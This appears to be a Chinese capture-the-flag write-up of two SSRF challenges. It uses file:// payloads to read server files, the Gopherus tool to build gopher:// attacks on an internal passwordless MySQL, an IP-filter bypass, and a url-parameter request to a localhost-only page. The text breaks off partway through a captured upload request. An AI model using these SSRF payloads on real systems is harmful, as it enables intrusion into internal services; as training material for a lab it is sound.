基础题(续)"/>
基础题(续)
1,网站联通测试系统
类型:ssrf
- 打开题目,查看网页源代码,发现
- 尝试使用file伪协议读取goodjob.php
file:///app/public/goodjob.php
发现提示
![在这里插入图片描述](.png)3. 添加localhost域名进行访问
file://localhost/app/public/goodjob.php
可以发现程序进行了 curl ‘file://localhost/app/public/goodjob.php’ 操作, 右键查看源代码,
得到goodjob.php文件内容
4. 可以发现提示信息,Mysql连接信息。 root用户且无密码,尝试gopher伪协议攻击内网mysql服
务查询hahaha数据库flag表里的值
使用工具 :[Gopherus]
python gopherus.py --exploit=mysql
5. 将脚本输出的url粘贴至页面表单处提交,发现提示
6. 绕过ip限制[127.0.0.1.:3306],获取flag
2,本地文件上传
类型:ssrf
- 打开链接,右键查看网页源代码,发现提示信息
- 通过url参数访问链接(直接访问http://47.104.255.11:10011/flag.php ,会显示Just View From
127.0.0.1)
http://47.104.255.11:10011/?url=http://127.0.0.1/flag.php
3. 上传文件尝试,依然Just View From 127.0.0.1,题目对flag.php限制只能本地访问,故可利用ssrf
漏洞将文件上传的POST请求构造为gopher伪协议url,从而进行内网上传
3. 上传文件,通过Burp拦截获取请求包
POST /flag.php HTTP/1.1
Host: 47.104.255.11:10011
Content-Length: 325
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://47.104.255.11:10011
Content-Type: multipart/form-data; boundary=----
WebKitFormBoundaryZKOAsg7lA0C323gB
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML,
like Gecko) Chrome/91.0.4472.164 Safari/537.36
Accept:
text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/
apng
更多推荐
基础题(续)
发布评论